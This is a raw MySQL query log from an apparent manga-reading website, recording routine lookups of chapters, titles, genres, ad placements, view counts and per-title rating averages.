330655324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655324 Quit 330655325 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655325 Quit 330655326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655326 Quit 330655327 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16720' 330655327 Quit 330655328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655328 Query select * FROM chapters where id = '16720' 330655328 Quit 330655329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655329 Query select * FROM chapters where manga_id = '324' order by id desc 330655329 Quit 330655330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655330 Query Update chapters set view=view+1 where id = '16720' 330655330 Quit 330655331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655331 Query select * FROM chapters where id = '16720' 330655331 Quit 330655332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655332 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16720' 330655332 Quit 330655333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655333 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('324', '16720', '102.100.220.115', 'mangacherri.com', '2026-02-26 03:29:42', '2026-02-26 03:29:42') 330655333 Quit 330655334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655334 Query select * FROM chapter_images where chapter_id = '16720' 330655334 Quit 330655335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655335 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '324' and m.active = 1 330655335 Quit 330655336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655336 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='324' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Sports%') ORDER BY RAND() limit 10 330655337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655337 Quit 330655338 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'tokimori-san-is-completely-defenseless' 330655338 Quit 330655339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655339 Query select * FROM chapters where manga_id = '327' order by id desc 330655339 Quit 330655340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655340 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '327' and m.active = 1 330655340 Quit 330655341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655341 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='327' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Office%' OR genres like '%Romance%' OR genres like '%Seinen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330655306 Quit 330655342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655342 Quit 330655343 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655343 Quit 330655344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655345 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655344 Quit 330655345 Quit 330655346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655346 Quit 330655347 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655347 Quit 330655348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655348 Quit 330655349 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655349 Quit 330655350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655350 Quit 330655351 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9558' 330655351 Quit 260225 19:29:43 330655336 Quit 330655352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655352 Quit 330655353 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655353 Quit 330655354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655354 Quit 330655355 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655355 Quit 330655356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655356 Quit 330655357 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655357 Quit 330655358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655358 Quit 330655359 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655359 Quit 330655341 Quit 330655360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655360 Query select * FROM comments where manga_id = '327' and parent_id is null order by created desc 330655360 Quit 330655361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655361 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '327' and m.active = 1 330655361 Quit 330655362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655362 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Comedy%' OR m.genres like '%Office%' OR m.genres like '%Romance%' OR m.genres like '%Seinen%' OR m.genres like '%Slice of Life%') group by manga_id ORDER BY sum(view) DESC 330655362 Quit 330655363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655363 Quit 330655364 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655364 Quit 330655365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330655365 Quit 330655366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655366 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330655366 Quit 330655367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330655367 Quit 330655368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330655368 Quit 330655369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330655369 Quit 330655370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330655370 Quit 330655371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330655371 Quit 330655372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330655372 Quit 330655373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330655373 Quit 330655374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330655374 Quit 330655375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330655375 Quit 330655376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330655376 Quit 330655377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330655377 Quit 330655378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330655378 Quit 330655379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330655379 Quit 330655380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330655380 Quit 330655381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330655381 Quit 330655382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330655382 Quit 330655383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330655383 Quit 330655384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330655384 Quit 330655385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330655385 Quit 330655386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330655386 Quit 330655387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330655387 Quit 330655388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330655388 Quit 330655389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330655389 Quit 330655390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330655390 Quit 330655391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330655391 Quit 330655392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330655392 Quit 330655393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330655393 Quit 330655394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330655394 Quit 330655395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330655395 Quit 330655396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330655396 Quit 330655397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330655397 Quit 330655398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330655398 Quit 330655399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330655399 Quit 330655400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330655400 Quit 330655401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330655401 Quit 330655402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330655402 Quit 330655403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330655403 Quit 330655404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330655404 Quit 330655405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330655405 Quit 330655406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330655406 Quit 330655407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330655407 Quit 330655408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330655409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655408 Quit 330655409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330655409 Quit 330655410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330655410 Quit 330655411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330655411 Quit 330655412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330655412 Quit 330655413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330655413 Quit 330655414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330655414 Quit 330655415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330655415 Quit 330655416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330655416 Quit 330655417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330655417 Quit 330655418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330655418 Quit 330655419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330655419 Quit 330655420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330655420 Quit 330655421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330655421 Quit 330655422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330655422 Quit 330655423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330655423 Quit 330655424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330655424 Quit 330655425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330655425 Quit 330655426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330655426 Quit 330655427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330655427 Quit 330655428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330655428 Quit 330655429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330655429 Quit 330655430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330655430 Quit 330655431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330655431 Quit 330655432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330655432 Quit 330655433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330655433 Quit 330655434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330655434 Quit 330655435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330655435 Quit 330655436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330655436 Quit 330655437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330655437 Quit 330655438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330655438 Quit 330655439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330655439 Quit 330655440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330655440 Quit 330655441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330655441 Quit 330655442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330655442 Quit 330655443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330655443 Quit 330655444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330655444 Quit 330655445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330655445 Quit 330655446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330655446 Quit 330655447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330655447 Quit 330655448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330655448 Quit 330655449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330655449 Quit 330655450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330655450 Quit 330655451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330655451 Quit 330655452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330655452 Quit 330655453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330655453 Quit 330655454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330655454 Quit 330655455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330655455 Quit 330655456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330655456 Quit 330655457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330655457 Quit 330655458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330655458 Quit 330655459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330655459 Quit 330655460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330655460 Quit 330655461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330655461 Quit 330655462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330655462 Quit 330655463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330655463 Quit 330655464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330655464 Quit 330655465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330655465 Quit 330655466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330655466 Quit 330655467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330655467 Quit 330655468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330655468 Quit 330655469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330655469 Quit 330655470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330655470 Quit 330655471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330655471 Quit 330655472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330655472 Quit 330655473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330655473 Quit 330655474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330655474 Quit 330655475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330655475 Quit 330655476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330655476 